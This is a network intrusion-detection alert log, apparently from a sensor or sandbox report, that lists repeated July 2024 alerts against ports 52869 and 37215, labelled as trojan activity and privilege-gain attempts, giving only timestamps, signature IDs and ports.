                      Timestamp:07/20/24-23:01:42.129029
                      SID:2027339
                      Source Port:34930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699598
                      SID:2831300
                      Source Port:45996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.370481
                      SID:2831300
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.133778
                      SID:2027339
                      Source Port:56752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:46804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2835222
                      Source Port:48034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.990801
                      SID:2027339
                      Source Port:40110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2025132
                      Source Port:54232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2829579
                      Source Port:39806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2829579
                      Source Port:60608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2829579
                      Source Port:47632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.812448
                      SID:2027339
                      Source Port:43362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.002255
                      SID:2831300
                      Source Port:59450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2027339
                      Source Port:55994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2025132
                      Source Port:38482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.244347
                      SID:2831300
                      Source Port:34198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.697010
                      SID:2027339
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.285243
                      SID:2027339
                      Source Port:36866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.498942
                      SID:2025132
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2835222
                      Source Port:32798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.176757
                      SID:2025132
                      Source Port:47606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.667512
                      SID:2027339
                      Source Port:58964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.918473
                      SID:2027339
                      Source Port:38286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2835222
                      Source Port:39794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2829579
                      Source Port:37622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.914137
                      SID:2027339
                      Source Port:53636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2835222
                      Source Port:47788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:48766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2831300
                      Source Port:36906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.940318
                      SID:2831300
                      Source Port:46312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2831300
                      Source Port:47380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2027339
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2027339
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.898102
                      SID:2027339
                      Source Port:49404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.604425
                      SID:2025132
                      Source Port:37388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.800583
                      SID:2025132
                      Source Port:41092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2027339
                      Source Port:34798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630627
                      SID:2835222
                      Source Port:50484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2027339
                      Source Port:33584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2831300
                      Source Port:43428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.379759
                      SID:2027339
                      Source Port:51148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2829579
                      Source Port:35574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2027339
                      Source Port:60092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2835222
                      Source Port:48624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.984371
                      SID:2025132
                      Source Port:35942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2027339
                      Source Port:37094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.121284
                      SID:2027339
                      Source Port:43794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:60490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2027339
                      Source Port:55212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.083668
                      SID:2027339
                      Source Port:39426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2835222
                      Source Port:60340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.632574
                      SID:2027339
                      Source Port:41520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2027339
                      Source Port:40540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.474975
                      SID:2831300
                      Source Port:48700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:11.700204
                      SID:2831300
                      Source Port:38574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2831300
                      Source Port:35888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2025132
                      Source Port:43152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:43.591633
                      SID:2027339
                      Source Port:33168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2027339
                      Source Port:44578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.848726
                      SID:2025132
                      Source Port:55424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.064325
                      SID:2831300
                      Source Port:54512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.547484
                      SID:2025132
                      Source Port:53402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.208327
                      SID:2831300
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.926055
                      SID:2027339
                      Source Port:36816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.569234
                      SID:2831300
                      Source Port:54596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2831300
                      Source Port:37604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2835222
                      Source Port:51724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:40.696155
                      SID:2027339
                      Source Port:40442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662837
                      SID:2027339
                      Source Port:42730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.794251
                      SID:2831300
                      Source Port:50094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.706162
                      SID:2027339
                      Source Port:49040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.364551
                      SID:2027339
                      Source Port:55070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2025132
                      Source Port:58956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.903232
                      SID:2027339
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509004
                      SID:2025132
                      Source Port:42880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.010169
                      SID:2027339
                      Source Port:42946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994703
                      SID:2025132
                      Source Port:40006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.751333
                      SID:2027339
                      Source Port:49320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.033190
                      SID:2831300
                      Source Port:45472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.977217
                      SID:2027339
                      Source Port:59800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2829579
                      Source Port:35672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2027339
                      Source Port:45804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:33388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.742499
                      SID:2025132
                      Source Port:58056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:42160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.380657
                      SID:2025132
                      Source Port:47818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.715800
                      SID:2027339
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:46924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:35020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2027339
                      Source Port:38406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:55284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2829579
                      Source Port:55614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.075219
                      SID:2829579
                      Source Port:41722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2027339
                      Source Port:58582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.660927
                      SID:2831300
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:54716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.779503
                      SID:2831300
                      Source Port:45168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.154049
                      SID:2831300
                      Source Port:58122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.030101
                      SID:2831300
                      Source Port:50420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2835222
                      Source Port:56194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.034246
                      SID:2025132
                      Source Port:43210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.922746
                      SID:2025132
                      Source Port:36258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.432181
                      SID:2027339
                      Source Port:42150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2831300
                      Source Port:43646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2835222
                      Source Port:57218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.930505
                      SID:2831300
                      Source Port:39212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.999794
                      SID:2831300
                      Source Port:39764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2835222
                      Source Port:57400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:55630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2025132
                      Source Port:43106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2831300
                      Source Port:60104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.875100
                      SID:2027339
                      Source Port:40704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2831300
                      Source Port:48580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2829579
                      Source Port:47794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:54922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:56186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.113046
                      SID:2025132
                      Source Port:47232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.903732
                      SID:2831300
                      Source Port:59476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:48558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.953491
                      SID:2027339
                      Source Port:35740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:37398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.036012
                      SID:2027339
                      Source Port:46612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.077334
                      SID:2835222
                      Source Port:58572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044693
                      SID:2025132
                      Source Port:53134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2027339
                      Source Port:37826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2027339
                      Source Port:46322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.293475
                      SID:2027339
                      Source Port:45978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2027339
                      Source Port:34858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.102095
                      SID:2027339
                      Source Port:59822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631134
                      SID:2829579
                      Source Port:33872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:55320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.193367
                      SID:2831300
                      Source Port:34414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.000956
                      SID:2025132
                      Source Port:39884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.697010
                      SID:2027339
                      Source Port:45262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.856294
                      SID:2027339
                      Source Port:42986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:40652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.276860
                      SID:2027339
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:59606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.650744
                      SID:2027339
                      Source Port:56526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559315
                      SID:2831300
                      Source Port:44538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.178390
                      SID:2025132
                      Source Port:42248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2025132
                      Source Port:42714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.391563
                      SID:2027339
                      Source Port:52480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2829579
                      Source Port:44180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.805449
                      SID:2027339
                      Source Port:60586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2831300
                      Source Port:50248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221248
                      SID:2835222
                      Source Port:38000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:51748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593869
                      SID:2027339
                      Source Port:59884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.020591
                      SID:2027339
                      Source Port:58950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:50596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.643745
                      SID:2831300
                      Source Port:53574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2025132
                      Source Port:34838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.080190
                      SID:2025132
                      Source Port:37272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2835222
                      Source Port:39850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:45678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2831300
                      Source Port:42756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.957856
                      SID:2831300
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.536207
                      SID:2025132
                      Source Port:50732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:59616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2831300
                      Source Port:33640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.761962
                      SID:2025132
                      Source Port:48840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.921416
                      SID:2027339
                      Source Port:45906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2831300
                      Source Port:34348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2835222
                      Source Port:37866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2027339
                      Source Port:45600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.589521
                      SID:2025132
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:52286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946380
                      SID:2025132
                      Source Port:50156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2027339
                      Source Port:42802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2025132
                      Source Port:55910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.107449
                      SID:2025132
                      Source Port:55444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2829579
                      Source Port:49292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:44260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2027339
                      Source Port:49438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2831300
                      Source Port:54532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.287237
                      SID:2831300
                      Source Port:44008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.976222
                      SID:2831300
                      Source Port:49862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:49836
                      Destination Port:37215
                      Protocol:TCP
